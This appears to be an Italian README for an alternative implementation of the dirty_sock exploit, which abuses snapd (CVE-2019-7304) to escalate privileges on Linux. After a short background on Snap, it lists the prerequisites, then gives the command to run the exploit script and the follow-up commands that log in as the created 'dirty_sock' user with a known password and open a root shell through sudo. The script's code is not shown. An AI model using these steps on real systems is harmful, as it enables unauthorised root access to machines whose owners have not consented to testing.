
Un'altra implementazione per l'exploit di escalation dei privilegi su Linux tramite snap(d) (CVE-2019-7304)
Un'altra implementazione per l'exploit di escalation dei privilegi Linux tramite snap(d) (CVE-2019-7304)
Snap è un sistema di confezionamento e distribuzione del software sviluppato da Canonical per i sistemi operativi che utilizzano il kernel Linux. I pacchetti, chiamati snap, e lo strumento per usarli, snapd, funzionano su una varietà di distribuzioni Linux e consentono agli sviluppatori software upstream di distribuire le loro applicazioni direttamente agli utenti. Gli snap sono applicazioni autonome che girano in una sandbox con accesso mediato al sistema host. Snap è stato originariamente rilasciato per applicazioni cloud[1] ma successivamente è stato portato per funzionare con dispositivi Internet of Things[3][4] e anche applicazioni desktop[5][6].
dirty_sock: Escalation dei privilegi Linux (tramite snapd)
- snap installato sul sistema
- avere sudo con o senza password su snap
./exp.sh "snap_path" "pwd"
ex:
./exp.sh "/usr/bin/snap" "/home/evil"
poi puoi usare
su - dirty_sock
dirty_sock (as password)
sudo bash